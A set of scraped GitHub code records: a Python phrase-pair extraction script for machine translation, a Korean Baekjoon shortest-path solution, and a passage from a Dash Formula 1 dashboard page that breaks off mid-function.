language2\n \"\"\"\n alignments_for_phrases=dict()\n phrase_pair_freqs = Counter()\n l1_phrase_freqs = Counter()\n l2_phrase_freqs = Counter()\n num_lines = number_of_lines(alignments_file)\n alignments = open(alignments_file, 'r')\n language1 = open(language1_file, 'r')\n language2 = open(language2_file, 'r')\n \n for i, str_align in enumerate(alignments):\n if num_lines>100:\n if i % (num_lines/100) is 0:\n sys.stdout.write('\\r%d%%' % (i*100/num_lines,))\n sys.stdout.flush()\n l1 = language1.next()\n l2 = language2.next()\n #print str_align, l1, l2\n align = str_to_alignments(str_align)\n words_aligns=create_word_align(align,l1,l2)\n phrase_alignments = extract_alignments(align, len(l1.split()),\n len(l2.split()),\n max_length)\n \n for phrase_pair in extract_phrase_pairs_gen(phrase_alignments, l1, l2):\n phrase_pair_freqs[phrase_pair] += 1\n l1_phrase_freqs[phrase_pair[0]] += 1\n l2_phrase_freqs[phrase_pair[1]] += 1\n alignments_for_phrases[phrase_pair]=words_aligns;\n\n alignments.close()\n language1.close()\n language2.close()\n sys.stdout.write('\\n')\n return phrase_pair_freqs, l1_phrase_freqs, l2_phrase_freqs,alignments_for_phrases\n\ndef extract_words_pair_freqs(alignments_file, language1_file,\n language2_file, \n max_length = float('inf')):\n \"\"\"Extract and count the frequency of all words pairs given an\n alignment between sentences.\n \n Keyword arguments:\n alignments_file -- file that contains the alignments\n language1_file -- file containing sentences from language 1\n language2_file -- file containing sentences from language 2\n max_length -- maximum length of phrase pairs\n \n Returns counter of words-pairs, counter of words in language1\n and counter of words in language2\n \"\"\"\n words_pair_freqs = dict()\n l1_words_freqs = dict()\n l2_words_freqs = dict()\n num_lines = number_of_lines(alignments_file)\n alignments = open(alignments_file, 'r')\n language1 = open(language1_file, 'r')\n language2 = open(language2_file, 'r')\n \n for i, str_align in enumerate(alignments):\n if num_lines>100:\n if i % (num_lines/100) is 0:\n sys.stdout.write('\\r%d%%' % (i*100/num_lines,))\n sys.stdout.flush()\n l1 = language1.next()\n l2 = language2.next()\n #print str_align, l1, l2\n align = str_to_alignments(str_align)\n \n for phrase_pair in extract_words_pairs_gen(align, l1, l2):\n if 'phrase_pair' in words_pair_freqs:\n words_pair_freqs[phrase_pair] += 1\n else:\n words_pair_freqs[phrase_pair] =1;\n \n if phrase_pair[0] in l1_words_freqs:\n l1_words_freqs[phrase_pair[0]] += 1\n else:\n l1_words_freqs[phrase_pair[0]] = 1\n \n if phrase_pair[1] in l2_words_freqs:\n l2_words_freqs[phrase_pair[1]] += 1\n else:\n l2_words_freqs[phrase_pair[1]] = 1\n\n alignments.close()\n language1.close()\n language2.close()\n sys.stdout.write('\\n')\n return words_pair_freqs, l1_words_freqs, l2_words_freqs\n\ndef create_word_align(align,l1,l2):\n \"\"\"Given alignments, extract words pairs from 2 sentences and save as tuple\n \n Keyword arguments:\n aligns -- list of words alignments.\n l1 -- sentence in language 1\n l2 -- sentence in language 2\n \n Yield a words pair\n \"\"\"\n l1_words = l1.strip().split()\n l2_words = l2.strip().split()\n new_aligns=set()\n for k1, k2 in align:\n new_aligns.add((l1_words[k1],l2_words[k2]))\n return new_aligns;\n\ndef extract_words_pairs_gen(aligns, l1, l2):\n \"\"\"Given alignments, extract words pairs from 2 sentences\n \n Keyword arguments:\n aligns -- list of words alignments.\n l1 -- sentence in language 1\n l2 -- sentence in language 2\n \n Yield a words pair\n \"\"\"\n l1_words = l1.strip().split()\n l2_words = l2.strip().split()\n for k1, k2 in aligns:\n yield ((l1_words[k1]), \n (l2_words[k2]))\n \ndef extract_phrase_pairs_gen(phrase_alignments, l1, l2):\n \"\"\"Given alignments, extract phrase pairs from 2 sentences\n \n Keyword arguments:\n phrase_alignments -- list of phraes alignments. A phrase alignment\n is a 4 tuple denoting the range of the constituents\n l1 -- sentence in language 1\n l2 -- sentence in language 2\n \n Yield a 2-tuple containing a phrase pair\n \"\"\"\n l1_words = l1.strip().split()\n l2_words = l2.strip().split()\n for min1, min2, max1, max2 in phrase_alignments:\n yield (' '.join(l1_words[min1:max1+1]), \n ' '.join(l2_words[min2:max2+1]))\n \ndef str_to_alignments(string):\n \"\"\"Parse an alignment from a string\n \n Keyword arguments:\n string -- contains alignment\n \n Return a set of 2-tuples. First value is index of word in language 1\n second value is index of word in language 2\n \"\"\"\n string_list = string.strip().split()\n alignments = set()\n \n for a_str in string_list:\n a1_str, a2_str = a_str.split('-')\n alignments.add((int(a1_str), int(a2_str)))\n\n return alignments\n\ndef phrase_alignment_expansions(phrase_alignments, max_length = float('inf')):\n \"\"\"For each language find the words that are not covered with the given\n phrase alignment.\n E.g. phrase_alignments = [(0,0), (2,0)]\n returns [1], []\n because index 1 in sentence 1 is not covered.\n \n Keyword arguments:\n phrase_alignments -- list of 2-tuples denoting the alignment between words\n max_length -- maximum length of a phrase alignment\n \n Returns 2 lists of indexes that are not covered\n \"\"\"\n min1, min2, max1, max2 = phrase_range(phrase_alignments)\n if max1-min1+1 > max_length or max2-min2+1 > max_length:\n return [], []\n\n range1 = range(min1, max1+1)\n range2 = range(min2, max2+1)\n for a1, a2 in phrase_alignments:\n if a1 in range1:\n range1.remove(a1)\n if a2 in range2:\n range2.remove(a2)\n\n return range1, range2\n \ndef phrase_range(phrase_alignments):\n \"\"\"Calcualte the range of a phrase alignment\n \n Keyword arguments:\n phrase_alignments -- list of 2-tuples denoting the alignment between words\n \n Returns a 4-tuples denoting the range of the phrase alignment\n \"\"\"\n min1 = min2 = float('inf')\n max1 = max2 = float('-inf')\n for (a1, a2) in phrase_alignments:\n if a1 < min1:\n min1 = a1\n if a1 > max1:\n max1 = a1\n if a2 < min2:\n min2 = a2\n if a2 > max2:\n max2 = a2\n\n return min1, min2, max1, max2\n\ndef extract_alignments(word_alignments, l1_length, l2_length,\n max_length = float('inf')):\n \"\"\"Extracts all alignments between 2 sentences given a word alignment\n \n Keyword arguments:\n word_alignemnts -- set of 2-tuples denoting alignment between words in \n 2 sentences\n l1_length -- length of sentence 1\n l2_length -- length of sentence 2\n max_length -- maximum length of a phrase pair\n \n Returns set of 4-tuples denoting the range of phrase_alignments\n \"\"\"\n phrase_queue = set()\n #copy to use later for singletons\n word_alignments_orig = set(word_alignments)\n # First form words into phrase pairs\n while len(word_alignments): \n phrase_alignment_init = word_alignments.pop()\n phrase_alignment = set([phrase_alignment_init])\n phrase_alignment_exp = [[phrase_alignment_init[0]], \n [phrase_alignment_init[1]]]\n while phrase_alignment_exp[0] or phrase_alignment_exp[1]:\n added_points = set([(x, y) for (x, y) in word_alignments \n if (x in phrase_alignment_exp[0] \n or y in phrase_alignment_exp[1])])\n # stop if no alignment can fill the gaps\n if not added_points:\n break\n\n phrase_alignment |= added_points\n word_alignments -= added_points\n phrase_alignment_exp = phrase_alignment_expansions(phrase_alignment, max_length)\n\n align_range = phrase_range(phrase_alignment)\n add_phrase_alignment(phrase_queue, align_range, max_length,\n l1_length, l2_length)\n\n #Then loop over phrase pairs to join them together into new ones\n phrase_alignment_list = set()\n while len(phrase_queue):\n p1 = phrase_queue.pop()\n new_p3 = set()\n #add singletons\n singleton = set([(x, y) for (x, y) in word_alignments_orig \n if x is p1[0]-1])\n if not singleton:\n p3 = p1[0]-1, p1[1], p1[2], p1[3]\n add_phrase_alignment(new_p3, p3, max_length, \n l1_length, l2_length)\n singleton = set([(x, y) for (x, y) in word_alignments_orig \n if x is p1[2]+1])\n if not singleton:\n p3 = p1[0], p1[1], p1[2]+1, p1[3]\n add_phrase_alignment(new_p3, p3, max_length, \n l1_length, l2_length)\n singleton = set([(x, y) for (x, y) in word_alignments_orig \n if y is p1[1]-1])\n if not singleton:\n p3 = p1[0], p1[1]-1, p1[2], p1[3]\n add_phrase_alignment(new_p3, p3, max_length,\n l1_length, l2_length)\n singleton = set([(x, y) for (x, y) in word_alignments_orig \n if y is p1[3]+1])\n if not singleton:\n p3 = p1[0], p1[1], p1[2], p1[3]+1\n add_phrase_alignment(new_p3, p3, max_length,\n l1_length, l2_length)\n\n for p2 in phrase_queue:\n p3 = None\n if p1[0] is p2[2]+1 and p1[1] is p2[3]+1:\n #p2 above, to the left of p1\n p3 = p2[0], p2[1], p1[2], p1[3]\n elif p1[2] is p2[0]-1 and p1[1] is p2[3]+1:\n #p2 above, to the right of p1\n p3 = p1[0], p2[1], p2[2], p1[3]\n elif p1[0] is p2[2]+1 and p1[3] is p2[1]-1:\n #p2 below, to the left of p1\n p3 = p2[0], p1[1], p1[2], p2[3]\n elif p1[2] is p2[0]-1 and p1[3] is p2[1]-1:\n #p2 below, to the right of p1\n p3 = p1[0], p1[1], p2[2], p2[3]\n # if p3 exists and is smaller or equal to the max length\n add_phrase_alignment(new_p3, p3, max_length,\n l1_length, l2_length)\n\n phrase_alignment_list.add(p1)\n phrase_queue |= new_p3\n\n return phrase_alignment_list\n\ndef phrase_pairs_to_file(file_name,l1_given_l2, l2_given_l1, l1_lexical_given_l2, l2_lexical_given_l1,l1_phrase_freqs, l2_phrase_freqs, phrase_pair_freqs ):\n \"\"\"Write phrase pairs and their joint and conditional probabilities to a file\n \n Keyword arguments:\n file_name -- name of file for writing\n phrase_pairs -- list of phrase pairs\n joint_probs -- dictionary mapping phrase pair to its joints probability\n l1_given_l2 -- dictionary mapping phrase pair (l1,l2) to is conditional \n probability P(l1 | l2)\n l2_given_l1 -- dictionary mapping phrase pair (l1,l2) to is conditional \n probability P(l2 | l1)\n \"\"\"\n out = open(file_name, 'w')\n for pair in phrase_pair_freqs:\n out.write('(%s, %s, %s, %s,%s, %s, %s, %s)\\n' % (pair, l1_given_l2[pair], l2_given_l1[pair], l1_lexical_given_l2[pair],l2_lexical_given_l1[pair],l1_phrase_freqs[pair[0]], l2_phrase_freqs[pair[1]], phrase_pair_freqs[pair]))\n\n out.close()\n\ndef number_of_lines(file_name):\n \"\"\"Counts the number of lines in a file\n \n Keywords arguments:\n file_name -- name of file\n \n Returns number of lines\n \"\"\"\n amount = 0\n doc = open(file_name, 'r')\n for _ in doc:\n amount += 1\n\n doc.close()\n return amount\n\ndef main():\n \"\"\"Read the following arguments from the cmd line:\n - name of file containing the alignments\n - name of file containing sentence of language 1\n - name of file containing sentence of language 2\n - name of file for writing output\n - maximum length of a phrase pair\n \"\"\"\n \n \"\"\"\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument(\"-a\", \"--alignments\",\n help=\"File containing alignments\")\n arg_parser.add_argument(\"-l1\", \"--language1\",\n help=\"File containing sentences of language 1\")\n arg_parser.add_argument(\"-l2\", \"--language2\",\n help=\"File containing sentences of language 2\")\n arg_parser.add_argument(\"-o\", \"--output\",\n help=\"File name of output\")\n arg_parser.add_argument(\"-m\", \"--max_length\",\n help=\"Maximum length of phrase pairs\")\n \"\"\"\n \n \"\"\"\n #args = arg_parser.parse_args()\n alignments = args.alignments\n language1 = args.language1\n language2 = args.language2\n output_name = args.output\n max_length = int(args.max_length)\n \"\"\"\n alignments=\"alignments\"\n language1=\"language1\"\n language2=\"language2\"\n output_name=\"output\"\n max_length=5\n\n \n freqs = extract_phrase_pair_freqs(alignments, language1, language2, max_length)\n words_freqs= extract_words_pair_freqs(alignments, language1, language2, max_length)\n phrase_pair_freqs, l1_phrase_freqs, l2_phrase_freqs,words_alignments = freqs\n words_pair_freqs, l1_words_freqs, l2_words_freqs = words_freqs\n l1_given_l2, l2_given_l1 = conditional_probabilities(phrase_pair_freqs, \n l1_phrase_freqs, l2_phrase_freqs)\n l1_word_given_l2, l2_word_given_l1 = conditional_probabilities(words_pair_freqs, \n l1_words_freqs, l2_words_freqs)\n l1_lexical_given_l2,l2_lexical_given_l1= lexical_probabilities(phrase_pair_freqs,l1_word_given_l2,l2_word_given_l1,words_alignments)\n #l2_phrase_probs = phrase_probabilities(l2_phrase_freqs)\n #joint_probs = joint_probabilities(l1_given_l2, l2_phrase_probs)\n phrase_pairs_to_file(output_name,l1_given_l2, l2_given_l1, l1_lexical_given_l2,l2_lexical_given_l1,l1_phrase_freqs, l2_phrase_freqs, phrase_pair_freqs )\n\n \nif __name__ == '__main__':\n main()\n","repo_name":"hubert667/ALT","sub_path":"ppe.py","file_name":"ppe.py","file_ext":"py","file_size_in_byte":19407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20966089743","text":"#특정 거리의 도시 찾기\n#bfs\n#https://www.acmicpc.net/problem/18352\n\n\n# <--------BFS------------>\n# import sys\n# from collections import deque\n \n# input = sys.stdin.readline\n\n# # 도시의 개수 N, 도로의 개수 M, 거리 정보 K, 출발 도시의 번호 X\n# n,m,k,x = map(int,input().rstrip().rsplit())\n# visited = [False] * (n+1)\n# graph = [[] for _ in range(n+1)]\n# result = []\n\n# for _ in range(m):\n# a,b = map(int,input().rstrip().rsplit())\n# graph[a].append(b)\n\n# Q = deque()\n# Q.append((0,x))\n# visited[x]=False\n\n# while Q:\n# time,node = Q.popleft()\n# for v in graph[node]:\n# # 방문하지 않은 노드일때만 거리를 +1 해서 큐에 넣어준다.\n# if not visited[v]:\n# visited[v] = time + 1\n# Q.append((time+1, v))\n\n# for i in range(len(visited)):\n# if visited[i]==k:\n# result.append(i)\n\n# if len(result)==0:\n# print(-1)\n\n# elif len(result)==1:\n# if x==result[0] and k!=0:\n# print(-1)\n# else:\n# result.sort()\n# for num in result:\n# print(num)\n# else:\n# result.sort()\n# for num in result:\n# print(num)\n\n\n# <--------다익스트라------------>\nimport sys\nimport heapq\nimport collections\ninput = sys.stdin.readline\n\n# 도시의 개수 N, 도로의 개수 M, 거리 정보 K, 출발 도시의 번호 X\nn,m,k,x = map(int,input().rstrip().rsplit())\ngraph = [[] for _ in range(n+1)]\nresult = []\n\nfor _ in range(m):\n a,b = map(int,input().rstrip().rsplit())\n graph[a].append((b,1))\n\nQ = [(0,x)]\ndist = collections.defaultdict(int)\n\nwhile Q:\n time,node = heapq.heappop(Q)\n if node not in dist:\n dist[node]=time\n for v,w in graph[node]:\n heapq.heappush(Q,(time+1,v))\n if time==k:\n result.append(node)\n\nif len(result)==0:\n print(-1)\n\nelif len(result)==1:\n if x==result[0] and k!=0:\n print(-1)\n else:\n result.sort()\n for num in result:\n print(num)\nelse:\n result.sort()\n for num in result:\n print(num)","repo_name":"uoayop/study.algorithm","sub_path":"baekjoon/18352.py","file_name":"18352.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20518801919","text":"import dash\nfrom dash import html, dcc\nimport pandas as pd\nfrom datetime import datetime\nimport Alpine.gp as f1\nimport os.path as path\nimport plotly.express as px\nimport numpy as np\nimport Alpine.strat as strat\nimport Alpine.utils as utils\nimport json\n\ndash.register_page(__name__, path=\"/grand-prix\", path_template=\"/grand-prix///\",\n title=\"Alpine Fan F1 Dashboard | Grand Prix\",\n description=\"Get all Formula 1's data on any Grand Prix since 2018. Choose your year, your event and the session then have Fun !\",\n image_url=\"https://alpinefan.robcorp.net/assets/images/logo.png\")\n\n\n# Setting up the dataframe\ndef get_dataframe():\n gp_data = pd.read_csv(path.join(\"data\", \"dates.csv\"))\n gp_data['Date'] = pd.to_datetime(gp_data['Date'])\n today = datetime.today()\n gp_data['Race_Status'] = np.where(gp_data['Date'] < today, 'Past', 'Future')\n color_map = {'Past': '#2ecc71', 'Future': '#e74c3c'}\n gp_data['Color'] = gp_data['Race_Status'].map(color_map)\n return gp_data\n\n\ndef make_map(filtered_data):\n map_fig = px.scatter_geo(filtered_data, lat='Lat', lon='Long', hover_name='Name', hover_data=[\"Year\", \"Round\"],\n color=\"Color\", color_discrete_sequence=list(pd.unique(filtered_data['Color'])))\n map_fig.update_geos(bgcolor=\"#2c3e50\", showcountries=True, countrycolor=\"#ecf0f1\",\n showcoastlines=True, coastlinecolor=\"#ecf0f1\", showframe=False)\n map_fig.update_layout(\n margin=dict(l=0, r=0, t=0, b=0),\n plot_bgcolor='rgba(0,0,0,0)',\n paper_bgcolor='rgba(0,0,0,0)',\n showlegend=False,\n dragmode=False\n )\n map_fig.update_traces(marker_size=10)\n return map_fig\n\n\ndef race_result(content, results):\n classement = []\n d_color = html.Div(className=\"color\")\n change = html.Div(className=\"evolution\")\n d_pos = html.Div(className=\"pos\", children=\"Pos\")\n d_num = html.Div(className=\"num\", children=\"N°\")\n d_name = html.Div(className=\"name\", children=\"Driver\")\n d_team = html.Div(className=\"team\", children=\"Team\")\n d_time = html.Div(className=\"time\", children=f\"Time\")\n d_pts = html.Div(className=\"pts\", children=\"Pts\")\n classement.append(\n html.Div(className=\"driver row\",\n children=[html.Div(className=\"flex\", children=[d_color, change, d_pos]), d_num, d_name, d_team, d_time,\n d_pts])\n )\n for index, row in results.iterrows():\n d_color = html.Div(className=\"color\", style={\"background-color\": f\"#{row['TeamColor']}\"})\n if (row['Position'] - row['GridPosition']) < 0:\n change = html.Img(className=\"evolution\", src=\"/assets/images/grow.svg\")\n elif (row['Position'] - row['GridPosition']) == 0:\n change = html.Img(className=\"evolution\", src=\"/assets/images/stable.svg\")\n elif (row['Position'] - row['GridPosition']) > 0:\n change = html.Img(className=\"evolution\", src=\"/assets/images/decrease.svg\")\n d_pos = html.Div(className=\"pos\", children=row['ClassifiedPosition'])\n d_num = html.Div(className=\"num\", children=row['DriverNumber'])\n d_name = html.Div(className=\"name\", children=row['FullName'])\n d_team = html.Div(className=\"team\", children=row['TeamName'])\n if row['Position'] == 1:\n d_time = html.Div(className=\"time\",\n children=f\"{row['Time'].seconds // 3600:02d}:{(row['Time'].seconds // 60) % 60:02d}:{row['Time'].seconds % 60:02d}.{int(row['Time'].total_seconds() * 1000) % 1000:03d}\")\n elif pd.isnull(row.Time):\n d_time = html.Div(className=\"time\", children=row['Status'])\n else:\n d_time = html.Div(className=\"time\",\n children=f\"{row['Time'].total_seconds():.3f}s\")\n d_pts = html.Div(className=\"pts\", children=row['Points'])\n if row['Position'] < 4:\n cl = \"driver\"\n else:\n cl = \"driver full\"\n classement.append(\n html.Div(className=cl,\n children=[html.Div(className=\"flex\", children=[d_color, change, d_pos]), d_num, d_name, d_team,\n d_time,\n d_pts])\n )\n more = html.Img(id=\"more-race\", src=\"/assets/images/more.svg\")\n content.append(html.Div(className=\"race\", children=[html.Div(className=\"title\", children=\"Race Results\"),\n html.Div(id=\"race-results\", children=classement), more]))\n return content\n\n\ndef qualy_result(content, results):\n classement = []\n d_color = html.Div(className=\"color\")\n d_pos = html.Div(className=\"pos\", children=\"Pos\")\n d_num = html.Div(className=\"num\", children=\"N°\")\n d_name = html.Div(className=\"name\", children=\"Driver\")\n d_team = html.Div(className=\"team\", children=\"Team\")\n d_time = html.Div(className=\"time\", children=\"Q1\")\n d_time2 = html.Div(className=\"time\", children=\"Q2\")\n d_time3 = html.Div(className=\"time\", children=\"Q3\")\n classement.append(\n html.Div(className=\"driver row\",\n children=[html.Div(className=\"flex\", children=[d_color, d_pos]), d_num, d_name, d_team, d_time,\n d_time2, d_time3])\n )\n\n results.Q1 = pd.to_timedelta(results.Q1)\n results.Q2 = pd.to_timedelta(results.Q2)\n results.Q3 = pd.to_timedelta(results.Q3)\n\n def Q_time(time, results_time):\n if not pd.isnull(time):\n if time == results_time.min():\n classname = \"time min\"\n else:\n classname = \"time\"\n d_time = html.Div(className=classname,\n children=f\"{(time.seconds // 60) % 60:02d}:{time.seconds % 60:02d}.{int(time.total_seconds() * 1000) % 1000:03d}\")\n else:\n d_time = html.Div(className=\"time\", children=\"-\")\n return d_time\n\n for index, row in results.iterrows():\n d_color = html.Div(className=\"color\", style={\"background-color\": f\"#{row['TeamColor']}\"})\n d_pos = html.Div(className=\"pos\", children=row['Position'])\n d_num = html.Div(className=\"num\", children=row['DriverNumber'])\n d_name = html.Div(className=\"name\", children=row['FullName'])\n d_team = html.Div(className=\"team\", children=row['TeamName'])\n d_time = Q_time(row.Q1, results.Q1)\n d_time2 = Q_time(row.Q2, results.Q2)\n d_time3 = Q_time(row.Q3, results.Q3)\n if row['Position'] < 4:\n cl = \"driver\"\n else:\n cl = \"driver full\"\n classement.append(\n html.Div(className=cl,\n children=[html.Div(className=\"flex\", children=[d_color, d_pos]), d_num, d_name, d_team, d_time,\n d_time2, d_time3])\n )\n more = html.Img(id=\"more-race\", src=\"/assets/images/more.svg\")\n content.append(html.Div(className=\"race\", children=[html.Div(className=\"title\", children=\"Qualifying Results\"),\n html.Div(id=\"race-results\", children=classement), more]))\n return content\n\n\n# Création du header pour toutes les différentes pages grand prix\ndef header(year, event, session, sprint, first, last):\n if session != \"fp\" and session != \"qualif\" and (session != \"sprint\" or not sprint) and session != \"race\":\n head = html.A(children=html.Div(className=\"active link\",\n children=[html.Label(className=\"desktop\", children=\"Overview\"),\n html.Label(className=\"mobile\", children=\"Home\")]),\n href=f\"/grand-prix/{year}/{event}/overview\"),\n else:\n head = html.A(children=html.Div(className=\"link\",\n children=[html.Label(className=\"desktop\", children=\"Overview\"),\n html.Label(className=\"mobile\", children=\"Home\")]),\n href=f\"/grand-prix/{year}/{event}/overview\"),\n if session == \"fp\":\n head += html.A(children=html.Div(className=\"active link\",\n children=[html.Label(className=\"desktop\", children=\"Free Practice\"),\n html.Label(className=\"mobile\", children=\"FP\")]),\n href=f\"/grand-prix/{year}/{event}/fp\"),\n else:\n head += html.A(children=html.Div(className=\"link\",\n children=[html.Label(className=\"desktop\", children=\"Free Practice\"),\n html.Label(className=\"mobile\", children=\"FP\")]),\n href=f\"/grand-prix/{year}/{event}/fp\"),\n if session == \"qualif\":\n head += html.A(children=html.Div(className=\"active link\",\n children=[html.Label(className=\"desktop\", children=\"Qualifying\"),\n html.Label(className=\"mobile\", children=\"Q\")]),\n href=f\"/grand-prix/{year}/{event}/qualif\"),\n else:\n head += html.A(children=html.Div(className=\"link\",\n children=[html.Label(className=\"desktop\", children=\"Qualifying\"),\n html.Label(className=\"mobile\", children=\"Q\")]),\n href=f\"/grand-prix/{year}/{event}/qualif\"),\n if sprint:\n if session == \"sprint\":\n head += html.A(children=html.Div(className=\"active link\",\n children=[html.Label(className=\"desktop\", children=\"Sprint\"),\n html.Label(className=\"mobile\", children=\"S\")]),\n href=f\"/grand-prix/{year}/{event}/sprint\"),\n else:\n head += html.A(children=html.Div(className=\"link\",\n children=[html.Label(className=\"desktop\", children=\"Sprint\"),\n html.Label(className=\"mobile\", children=\"S\")]),\n href=f\"/grand-prix/{year}/{event}/sprint\"),\n if session == \"race\":\n head += html.A(children=html.Div(className=\"active link\",\n children=[html.Label(className=\"desktop\", children=\"Race\"),\n html.Label(className=\"mobile\", children=\"Race\")]),\n href=f\"/grand-prix/{year}/{event}/race\"),\n else:\n head += html.A(children=html.Div(className=\"link\", children=[html.Label(className=\"desktop\", children=\"Race\"),\n html.Label(className=\"mobile\", children=\"Race\")]),\n href=f\"/grand-prix/{year}/{event}/race\"),\n if first[0]:\n previous = html.A(className=\"previous change off\",\n children=[html.I(className='fas fa-arrow-left'), html.Label(children=\"Previous\")])\n else:\n previous = html.A(className=\"previous change\",\n children=[html.I(className='fas fa-arrow-left'), html.Label(children=\"Previous\")],\n href=f\"/grand-prix/{first[1]}/overview\")\n if last[0]:\n next = html.A(className=\"next change off\",\n children=[html.Label(children=\"Next\"), html.I(className='fas fa-arrow-right')])\n else:\n next = html.A(className=\"next change\",\n children=[html.Label(children=\"Next\"), html.I(className='fas fa-arrow-right')],\n href=f\"/grand-prix/{last[1]}/overview\")\n return html.Div(className=\"gp-header\", children=[\n html.Div(className=\"left\", children=[\n previous\n ]),\n html.Div(className=\"hor-nav\", children=head),\n html.Div(className=\"right\", children=[\n next\n ]),\n ])\n\n\n# Creating the FP page\ndef fp_design(Fp, parts, fp):\n parts[\"lap_times\"].append(\n html.Div(className=\"plot lap_times\", children=dcc.Graph(id=f'{Fp}_lap_times', figure=fp.lap_times(Fp))))\n parts[\"violin_st\"].append(\n html.Div(className=\"plot violin_st\", children=dcc.Graph(id=f'{Fp}_violin_st', figure=fp.violin_st(Fp))))\n parts[\"violin_lap\"].append(\n html.Div(className=\"plot violin_lap\", children=dcc.Graph(id=f'{Fp}_violin_lap', figure=fp.violin_lap(Fp))))\n parts[\"race_sim\"].append(\n html.Div(className=\"plot race_sim\", children=dcc.Graph(id=f'{Fp}_race_sim', figure=fp.race_sim(Fp))))\n parts[\"top_speed\"].append(\n html.Div(className=\"plot top_speed\", children=dcc.Graph(id=f'{Fp}_top_speed', figure=fp.top_speed(Fp))))\n parts[\"lap_comp\"].append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id=f'{Fp}_lap_comp', figure=fp.lap_comp(Fp))))\n return parts\n\n\ndef fp(year, event):\n fp = f1.get_fp(year, event)\n fp1, fp2, fp3, date = fp.get_load\n parts = {\n \"lap_times\": [],\n \"violin_st\": [],\n \"violin_lap\": [],\n \"race_sim\": [],\n \"top_speed\": [],\n \"lap_comp\": [],\n }\n comming = []\n if fp1:\n parts = fp_design(\"Fp1\", parts, fp)\n elif date[0] != \"Never\":\n comming.append(\n html.Div(className=\"plot comming\", children=html.P(children=date[0]))\n )\n if fp2:\n parts = fp_design(\"Fp2\", parts, fp)\n elif date[1] != \"Never\":\n comming.append(\n html.Div(className=\"plot comming\", children=html.P(children=date[1]))\n )\n if fp3:\n parts = fp_design(\"Fp3\", parts, fp)\n elif date[2] != \"Never\":\n comming.append(\n html.Div(className=\"plot comming\", children=html.P(children=date[2]))\n )\n return parts[\"lap_times\"] + parts[\"violin_st\"] + parts[\"violin_lap\"] + parts[\"race_sim\"] + parts[\n \"top_speed\"] + comming + parts[\"lap_comp\"]\n\n\ndef Qualy(year, event, name):\n qualy = f1.get_quali(year, event)\n q, date = qualy.get_load\n main = []\n if q:\n try:\n main = qualy_result(main, qualy.results)\n except:\n utils.error(f\"Could not show Qualy results for {name} {year}\")\n main.append(\n html.Div(className=\"plot lap_times\", children=dcc.Graph(id='qualy_lap_times', figure=qualy.lap_times())))\n main.append(\n html.Div(className=\"plot violin_st\", children=dcc.Graph(id='qualy_violin_st', figure=qualy.violin_st())))\n main.append(\n html.Div(className=\"plot violin_lap\", children=dcc.Graph(id='qualy_violin_lap', figure=qualy.violin_lap())))\n main.append(\n html.Div(className=\"plot top_speed\", children=dcc.Graph(id='qualy_top_speed', figure=qualy.top_speed())))\n main.append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='qualy_lap_comp', figure=qualy.lap_comp())))\n else:\n main.append(\n html.Div(className=\"plot comming\", children=html.P(children=date))\n )\n return main\n\n\ndef Sprint(year, event, format, name):\n sprint = f1.get_sprint(year, event, format)\n q, r, q_date, r_date = sprint.get_load\n main = []\n try:\n main = race_result(main, sprint.results)\n except:\n if r:\n utils.error(f\"Could not show Race results for {name} {year}\")\n if format == \"sprint_shootout\" and q:\n main.append(\n html.Div(className=\"plot lap_times\",\n children=dcc.Graph(id='sprint_lap_times', figure=sprint.Q_lap_times())))\n main.append(\n html.Div(className=\"plot violin_st\",\n children=dcc.Graph(id='sprint_violin_st', figure=sprint.Q_violin_st())))\n main.append(\n html.Div(className=\"plot violin_lap\",\n children=dcc.Graph(id='sprint_violin_lap', figure=sprint.Q_violin_lap())))\n main.append(\n html.Div(className=\"plot top_speed\",\n children=dcc.Graph(id='sprint_top_speed', figure=sprint.Q_top_speed())))\n main.append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='sprint_lap_comp', figure=sprint.Q_lap_comp())))\n elif format == \"sprint_shootout\":\n main.append(\n html.Div(className=\"plot comming\", children=html.P(children=q_date))\n )\n if r:\n try:\n main.append(html.Div(className=\"plot lap_comp\",\n children=dcc.Graph(id='race_delta_to_first', figure=sprint.delta_to_first())))\n except:\n utils.error(f\"Sprint delta to first from {event} {year} could not be displayed\")\n main.append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='race_lap_times', figure=sprint.lap_times())))\n main.append(\n html.Div(className=\"plot violin_st\", children=dcc.Graph(id='race_violin_st', figure=sprint.violin_st())))\n main.append(\n html.Div(className=\"plot violin_lap\", children=dcc.Graph(id='race_violin_lap', figure=sprint.violin_lap())))\n main.append(\n html.Div(className=\"plot top_speed\", children=dcc.Graph(id='race_top_speed', figure=sprint.top_speed())))\n else:\n main.append(\n html.Div(className=\"plot comming\", children=html.P(children=r_date))\n )\n return main\n\n\ndef Race(year, event, name):\n race = f1.get_race(year, event)\n r, date = race.get_load\n main = []\n try:\n exist, predict = strat.strat(name)\n if exist:\n main.append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='race_predict', figure=predict)))\n except:\n utils.error(f'Something went wrong went trying to display the prediction of {name} {year}')\n if r:\n try:\n main = race_result(main, race.results)\n except:\n utils.error(f\"Could not show Race results for {name} {year}\")\n try:\n main.append(\n html.Div(className=\"plot lap_comp\",\n children=dcc.Graph(id='race_delta_to_first', figure=race.delta_to_first())))\n except:\n utils.error(f\"Race delta to first from {name} {year} could not be displayed\")\n main.append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='race_lap_times', figure=race.lap_times())))\n main.append(\n html.Div(className=\"plot lap_comp\", children=dcc.Graph(id='race_pos_evo', figure=race.drivers_evo())))\n main.append(\n html.Div(className=\"plot violin_st\", children=dcc.Graph(id='race_violin_st', figure=race.violin_st())))\n main.append(\n html.Div(className=\"plot violin_lap\", children=dcc.Graph(id='race_violin_lap', figure=race.violin_lap())))\n main.append(\n html.Div(className=\"plot top_speed\", children=dcc.Graph(id='race_top_speed', figure=race.top_speed())))\n else:\n main.append(\n html.Div(className=\"plot comming\", children=html.P(children=date))\n )\n return main\n\n\ndef content(year, event, session, we):\n if session == \"fp\":\n main = fp(year, event)\n elif session == \"qualif\":\n main = Qualy(year, event, we.Name.iloc[0])\n elif session == \"race\":\n main = 